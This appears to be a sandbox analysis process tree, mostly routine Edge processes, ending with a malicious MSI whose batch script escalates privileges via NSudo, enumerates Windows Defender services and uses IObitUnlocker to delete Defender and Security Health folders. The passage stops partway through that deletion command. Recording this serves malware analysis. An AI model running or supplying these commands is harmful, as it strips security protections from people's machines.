C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6308,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=4000 /prefetch:82⤵PID:3700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=7764,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5672 /prefetch:12⤵PID:5128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=8024,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8060 /prefetch:12⤵PID:1344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6476,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7024 /prefetch:82⤵PID:5328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=7912,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7880 /prefetch:12⤵PID:1684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=8244,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8216 /prefetch:12⤵PID:1292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=7584,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8384 /prefetch:12⤵PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=8380,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5328 /prefetch:12⤵PID:3868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6672,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=3672 /prefetch:82⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=8452,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7244 /prefetch:12⤵PID:5412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3808,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7212 /prefetch:82⤵PID:3628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3808,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7212 /prefetch:82⤵PID:5328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=8200,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7520 /prefetch:12⤵PID:5920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7212,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7544 /prefetch:82⤵PID:2744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3672,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8124 /prefetch:82⤵PID:5660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=8124,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=3532 /prefetch:12⤵PID:2968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=7900,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7704 /prefetch:12⤵PID:1476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=7736,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7932 /prefetch:12⤵PID:812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=8440,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7524 /prefetch:12⤵PID:1460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=7976,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7404 /prefetch:12⤵PID:6008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8376,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=1360 /prefetch:82⤵PID:2520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=8116,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8140 /prefetch:12⤵PID:1340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=7860,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7732 /prefetch:12⤵PID:4108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=6496,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7752 /prefetch:12⤵PID:3052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8060,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8236 /prefetch:82⤵PID:5928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8584,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8596 /prefetch:82⤵PID:780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8536,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8548 /prefetch:82⤵PID:816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8736,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8800 /prefetch:82⤵PID:1476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7964,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8280 /prefetch:82⤵PID:1904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8800,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8752 /prefetch:82⤵PID:3808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=8580,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8228 /prefetch:12⤵PID:1328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=6904,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8248 /prefetch:12⤵PID:5640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=7424,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7852 /prefetch:12⤵PID:1748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7780,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8752 /prefetch:82⤵PID:748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --always-read-main-dll --field-trial-handle=8896,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=8152 /prefetch:12⤵PID:812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7348,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:82⤵PID:1792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:2116
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:4808
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:5068
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1120
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\smb-y16ftv9_\" -spe -an -ai#7zMap24000:86:7zEvent54761⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4840
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\satan\" -spe -an -ai#7zMap14684:72:7zEvent313041⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3640
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\satan\" -spe -an -ai#7zMap7707:72:7zEvent91361⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2808
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\b44520d14068181d5d7ffbeb1b15dbf23a27bf80bdfe610b75385755c2dde35c\" -spe -an -ai#7zMap30482:190:7zEvent155221⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4904
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\b44520d14068181d5d7ffbeb1b15dbf23a27bf80bdfe610b75385755c2dde35c\b44520d14068181d5d7ffbeb1b15dbf23a27bf80bdfe610b75385755c2dde35c.msi"1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5796
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5896 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:3396
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c start "" /min "C:\Users\Admin\AppData\Local\Temp\MyTempTool\24.bat"2⤵
- System Location Discovery: System Language Discovery
PID:3632 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\MyTempTool\24.bat"3⤵
- System Location Discovery: System Language Discovery
PID:5128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\MyTempTool\24.bat" any_word4⤵
- System Location Discovery: System Language Discovery
PID:3444 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:5616
-
-
C:\Windows\SysWOW64\reg.exereg query "HKU\S-1-5-19"5⤵
- System Location Discovery: System Language Discovery
PID:5796
-
-
C:\Windows\SysWOW64\reg.exereg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f5⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5548
-
-
C:\Users\Admin\AppData\Local\Temp\MyTempTool\Work\NSudoLG.exeNSudoLG -U:T -P:E -UseCurrentConsole C:\Users\Admin\AppData\Local\Temp\MyTempTool\24.bat5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4004
-
-
C:\Windows\SysWOW64\mode.comMode 79,495⤵
- System Location Discovery: System Language Discovery
PID:5580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver5⤵
- System Location Discovery: System Language Discovery
PID:4776
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"5⤵
- System Location Discovery: System Language Discovery
PID:4380
-
-
C:\Windows\SysWOW64\find.exefind /i "0x0"5⤵
- System Location Discovery: System Language Discovery
PID:4792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist5⤵
- System Location Discovery: System Language Discovery
PID:1052 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:2200
-
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\WinDefend"5⤵
- System Location Discovery: System Language Discovery
PID:4436
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"5⤵
- System Location Discovery: System Language Discovery
PID:5252
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"5⤵
- System Location Discovery: System Language Discovery
PID:3036
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\Sense"5⤵
- System Location Discovery: System Language Discovery
PID:2316
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\wscsvc"5⤵
- System Location Discovery: System Language Discovery
PID:5624
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"5⤵
- System Location Discovery: System Language Discovery
PID:5340
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"5⤵
- System Location Discovery: System Language Discovery
PID:5804
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"5⤵
- System Location Discovery: System Language Discovery
PID:432
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"5⤵
- System Location Discovery: System Language Discovery
PID:2396
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"5⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\WdBoot"5⤵
- System Location Discovery: System Language Discovery
PID:5440
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\WdFilter"5⤵
- System Location Discovery: System Language Discovery
PID:5824
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"5⤵
- System Location Discovery: System Language Discovery
PID:5208
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"5⤵
- System Location Discovery: System Language Discovery
PID:456
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"5⤵
- System Location Discovery: System Language Discovery
PID:3324
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\System\CurrentControlSet\Services\MsSecCore"5⤵
- System Location Discovery: System Language Discovery
PID:644
-
-
C:\Windows\SysWOW64\reg.exereg query HKLM\System\CurrentControlset\Services\WdFilter5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2432
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"5⤵
- System Location Discovery: System Language Discovery
PID:2284
-
-
C:\Windows\SysWOW64\find.exefind /i "Windows 7"5⤵
- System Location Discovery: System Language Discovery
PID:2124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "5⤵
- System Location Discovery: System Language Discovery
PID:4852
-
-
C:\Windows\SysWOW64\findstr.exefindstr /c:"6.1.7601"5⤵
- System Location Discovery: System Language Discovery
PID:4392
-
-
C:\Users\Admin\AppData\Local\Temp\MyTempTool\Work\7z.exe7z x -aoa -bso0 -bsp1 "DKTolz.zip" -p"DDK" "Unlocker.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2492
-
-
C:\Users\Admin\AppData\Local\Temp\MyTempTool\Work\Unlocker.exeUnlocker /currentDiskSize5⤵
- Checks computer location settings
- Executes dropped EXE
PID:5936 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker6⤵PID:4896
-
C:\Windows\system32\sc.exesc query IObitUnlocker7⤵
- Launches sc.exe
PID:5964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "5936"6⤵PID:1944
-
C:\Windows\system32\taskkill.exetaskkill /f /pid "5936"7⤵
- Kills process with taskkill
PID:6008
-
-
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\Software\Microsoft\Windows Advanced Threat Protection"5⤵
- System Location Discovery: System Language Discovery
PID:4424
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC"5⤵
- System Location Discovery: System Language Discovery
PID:2940
-
-
C:\Windows\SysWOW64\reg.exereg query "HKCR\Directory\shellex\ContextMenuHandlers\EPP"5⤵
- System Location Discovery: System Language Discovery
PID:2392
-
-
C:\Users\Admin\AppData\Local\Temp\MyTempTool\Work\Unlocker.exeUnlocker /dеlwd5⤵
- Checks computer location settings
- Executes dropped EXE
PID:5100 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker6⤵PID:3748
-
C:\Windows\system32\sc.exesc query IObitUnlocker7⤵
- Launches sc.exe
PID:3500
-
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 